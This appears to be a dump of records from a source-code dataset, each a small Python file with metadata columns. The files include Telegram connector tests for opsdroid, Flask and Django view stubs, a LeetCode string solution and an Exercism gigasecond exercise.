await connector.telegram_webhook_handler(mock_request)
assert contact_event.first_name == "opsdroid"
assert contact_event.phone_number == 123456
@pytest.mark.asyncio
async def test_unparseable_event(opsdroid, caplog):
caplog.set_level(logging.DEBUG)
opsdroid.config["web"] = {"base-url": "https://test.com"}
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
message = {
"update_id": 1,
"message": {
"message_id": 1279,
"from": {
"id": 639889348,
"is_bot": False,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"language_code": "en",
},
"chat": {
"id": 639889348,
"first_name": "Fabio",
"last_name": "Rosado",
"username": "FabioRosado",
"type": "private",
},
"date": 1604013500,
"sticker": {
"width": 512,
"height": 512,
"emoji": "👌",
"set_name": "HotCherry",
"is_animated": True,
"file_size": 42311,
},
},
}
event = await connector.handle_messages(message, "opsdroid", 0, 1)
assert "Received unparsable event" in caplog.text
assert event is None
@pytest.mark.asyncio
async def test_channel_post(opsdroid):
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974037,
"channel_post": {
"message_id": 4,
"chat": {"id": -1001474709998, "title": "Opsdroid-test", "type": "channel"},
"date": 1603817533,
"text": "dance",
},
}
message = opsdroid_events.Message("dance", 4, opsdroid)
await connector.telegram_webhook_handler(mock_request)
assert message.text == "dance"
@pytest.mark.asyncio
async def test_parse_user_no_permissions(opsdroid):
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = [1, "AllowedUser"]
connector_config["reply-unauthorized"] = True
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
with amock.patch.object(connector, "send_message") as mocked_send_message:
await connector.telegram_webhook_handler(mock_request)
assert mocked_send_message.called
@pytest.mark.asyncio
async def test_parse_user_permissions(opsdroid):
mock_request = amock.CoroutineMock()
mock_request.json = amock.CoroutineMock()
mock_request.json.return_value = {
"update_id": 639974077,
"message": {
"message_id": 31,
"from": {"id": 100000, "is_bot": False, "username": "FabioRosado"},
"chat": {
"id": -10014170000,
"title": "Opsdroid-test Chat",
"type": "supergroup",
},
"date": 1603827368,
"text": "hi",
},
}
connector_config["whitelisted-users"] = ["FabioRosado", 100000]
connector = ConnectorTelegram(connector_config, opsdroid=opsdroid)
with amock.patch.object(connector.opsdroid, "parse") as mocked_parse:
await connector.telegram_webhook_handler(mock_request)
assert mocked_parse.called
| 29.634578 | 88 | 0.59172 | 2,968 | 30,168 | 5.80155 | 0.086253 | 0.035774 | 0.042163 | 0.076195 | 0.831639 | 0.826297 | 0.806086 | 0.772983 | 0.759336 | 0.735815 | 0 | 0.05832 | 0.291236 | 30,168 | 1,017 | 89 | 29.663717 | 0.746937 | 0 | 0 | 0.663717 | 0 | 0.002528 | 0.162424 | 0.015381 | 0 | 0 | 0 | 0 | 0.11378 | 1 | 0.013906 | false | 0 | 0.00885 | 0 | 0.022756 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
174ecfefbed674f3ba2ed3b722871cfa4037526c | 160 | py | Python | module2/views.py | LawAlias/gisflask | 4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e | [
"Apache-2.0"
] | 17 | 2019-03-22T01:01:10.000Z | 2022-03-03T09:56:51.000Z | module2/views.py | LawAlias/gisflask | 4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e | [
"Apache-2.0"
] | null | null | null | module2/views.py | LawAlias/gisflask | 4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e | [
"Apache-2.0"
] | 12 | 2019-03-22T13:30:23.000Z | 2020-05-15T05:36:17.000Z | from flask import flash,render_template
from module2 import app
@app.route('/module2',methods=['GET','POST'])
def module2():
return ('module2 load success') | 32 | 45 | 0.7375 | 22 | 160 | 5.318182 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028169 | 0.1125 | 160 | 5 | 46 | 32 | 0.795775 | 0 | 0 | 0 | 0 | 0 | 0.217391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
bd7bbf50df66af4fbd8ad42a43be731685f819fb | 10,254 | py | Python | src/459. Repeated Substring Pattern.py | xiaonanln/myleetcode-python | 95d282f21a257f937cd22ef20c3590a69919e307 | [
"Apache-2.0"
] | null | null | null | src/459. Repeated Substring Pattern.py | xiaonanln/myleetcode-python | 95d282f21a257f937cd22ef20c3590a69919e307 | [
"Apache-2.0"
] | null | null | null | src/459. Repeated Substring Pattern.py | xiaonanln/myleetcode-python | 95d282f21a257f937cd22ef20c3590a69919e307 | [
"Apache-2.0"
] | null | null | null | class Solution(object):
def repeatedSubstringPattern(self, s):
"""
:type s: str
:rtype: bool
"""
if not s: return True
return s in (s+s)[1:-1]
print(Solution().repeatedSubstringPattern("abab"))
print(Solution().repeatedSubstringPattern("czmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsveczmgyjgfdxvtnunneslsplwuiupfxlzbknhkwppanltcfirjcddsozoyvegurfwcsfmoxeqmrjowrghwlkobmeahkgccnaehhsvs")) | 932.181818 | 10,046 | 0.992296 | 32 | 10,254 | 317.96875 | 0.625 | 0.002555 | 0.007273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000196 | 0.003511 | 10,254 | 11 | 10,046 | 932.181818 | 0.995596 | 0.002438 | 0 | 0 | 0 | 0 | 0.979248 | 0.978857 | 0 | 1 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.5 | 0.333333 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bd86b7c12e2fce81818955014537f191b53a30d8 | 43 | py | Python | data_processing/visualization/preprocessing/__init__.py | FMsunyh/keras-retinanet | cb86a987237d3f6bd504004e2b186cf65606c890 | [
"Apache-2.0"
] | 25 | 2019-04-14T05:42:28.000Z | 2022-01-04T18:57:26.000Z | core/preprocessing/__init__.py | FMsunyh/keras-yolo2 | 3439e2cffecbb47349fca8adb727c1c298d9c2d9 | [
"Apache-2.0"
] | 1 | 2020-04-30T10:52:24.000Z | 2020-04-30T10:52:24.000Z | core/preprocessing/__init__.py | FMsunyh/keras-yolo2 | 3439e2cffecbb47349fca8adb727c1c298d9c2d9 | [
"Apache-2.0"
] | 4 | 2019-07-23T10:00:46.000Z | 2021-10-12T02:52:04.000Z | from .pascal_voc import PascalVocGenerator
| 21.5 | 42 | 0.883721 | 5 | 43 | 7.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093023 | 43 | 1 | 43 | 43 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bd94f3e5a8530836d0dc0dfba8f136522b469305 | 681 | py | Python | apps/webodoobim/views/views.py | youssriaboelseod/pyerp | 9ef9873e2ff340010656f0c518bccf9d7a14dbaa | [
"MIT"
] | 1 | 2022-03-19T14:43:02.000Z | 2022-03-19T14:43:02.000Z | apps/webodoobim/views/views.py | youssriaboelseod/pyerp | 9ef9873e2ff340010656f0c518bccf9d7a14dbaa | [
"MIT"
] | null | null | null | apps/webodoobim/views/views.py | youssriaboelseod/pyerp | 9ef9873e2ff340010656f0c518bccf9d7a14dbaa | [
"MIT"
] | 1 | 2020-03-28T03:26:32.000Z | 2020-03-28T03:26:32.000Z | # Furture Library
from __future__ import unicode_literals
# Django Library
from django.core.mail import EmailMessage
from django.shortcuts import HttpResponse, render
from django.template.loader import render_to_string
from django.views.generic import DetailView, ListView
BIM_PHONE = "+56 9 4299 4534"
def index(request):
return render(request, 'webodoobim/index.html')
def about(request):
return render(request, 'webodoobim/about.html')
def services(request):
return render(request, 'webodoobim/services.html')
def contact(request):
return render(request, 'webodoobim/contact_us.html')
def blog(request):
return render(request, 'webodoobim/blog.html')
| 26.192308 | 56 | 0.778267 | 88 | 681 | 5.920455 | 0.443182 | 0.12476 | 0.182342 | 0.24952 | 0.345489 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018487 | 0.126285 | 681 | 25 | 57 | 27.24 | 0.857143 | 0.044053 | 0 | 0 | 0 | 0 | 0.195988 | 0.141975 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3125 | false | 0 | 0.3125 | 0.3125 | 0.9375 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
bdd4e81d34c6888ed11845e48d4858080617f549 | 83 | py | Python | shared/consts.py | JFF-Bohdan/item_lookup | cf98c94d7b212a81ef499e8160f855fc3e9015ce | [
"MIT"
] | 1 | 2021-02-17T21:07:19.000Z | 2021-02-17T21:07:19.000Z | shared/consts.py | JFF-Bohdan/item_lookup | cf98c94d7b212a81ef499e8160f855fc3e9015ce | [
"MIT"
] | null | null | null | shared/consts.py | JFF-Bohdan/item_lookup | cf98c94d7b212a81ef499e8160f855fc3e9015ce | [
"MIT"
] | null | null | null | DATABASE_FILE = "./db/passports.sqlite"
LMDB_DATABASE_FILE = "./db/passports.lmdb"
| 27.666667 | 42 | 0.759036 | 11 | 83 | 5.454545 | 0.545455 | 0.4 | 0.466667 | 0.766667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072289 | 83 | 2 | 43 | 41.5 | 0.779221 | 0 | 0 | 0 | 0 | 0 | 0.481928 | 0.253012 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
bde0f64adfcc1ab4d37182c94ac58ac30f546861 | 28 | py | Python | apps/import_excel/views/__init__.py | crisariasgg/RepinSolution | 27e9b04ccc887b4300d77dda8657e761f9523123 | [
"MIT"
] | null | null | null | apps/import_excel/views/__init__.py | crisariasgg/RepinSolution | 27e9b04ccc887b4300d77dda8657e761f9523123 | [
"MIT"
] | null | null | null | apps/import_excel/views/__init__.py | crisariasgg/RepinSolution | 27e9b04ccc887b4300d77dda8657e761f9523123 | [
"MIT"
] | 1 | 2021-12-09T21:27:35.000Z | 2021-12-09T21:27:35.000Z | from .import_excel import *
| 14 | 27 | 0.785714 | 4 | 28 | 5.25 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
da0cb8f822c20c57be99cc70746cc800b4abaaf2 | 146 | py | Python | python/gigasecond/gigasecond.py | troberson/exercises-exercism | 143c94c72e05661b4ec3b7e383d5afcd2a75710f | [
"Unlicense"
] | 1 | 2018-10-13T00:18:41.000Z | 2018-10-13T00:18:41.000Z | python/gigasecond/gigasecond.py | troberson/exercises-exercism | 143c94c72e05661b4ec3b7e383d5afcd2a75710f | [
"Unlicense"
] | null | null | null | python/gigasecond/gigasecond.py | troberson/exercises-exercism | 143c94c72e05661b4ec3b7e383d5afcd2a75710f | [
"Unlicense"
] | null | null | null | from datetime import datetime, timedelta
def add_gigasecond(birth_date: datetime) -> datetime:
return birth_date + timedelta(seconds=10**9)
| 24.333333 | 53 | 0.773973 | 19 | 146 | 5.789474 | 0.684211 | 0.163636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02381 | 0.136986 | 146 | 5 | 54 | 29.2 | 0.849206 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
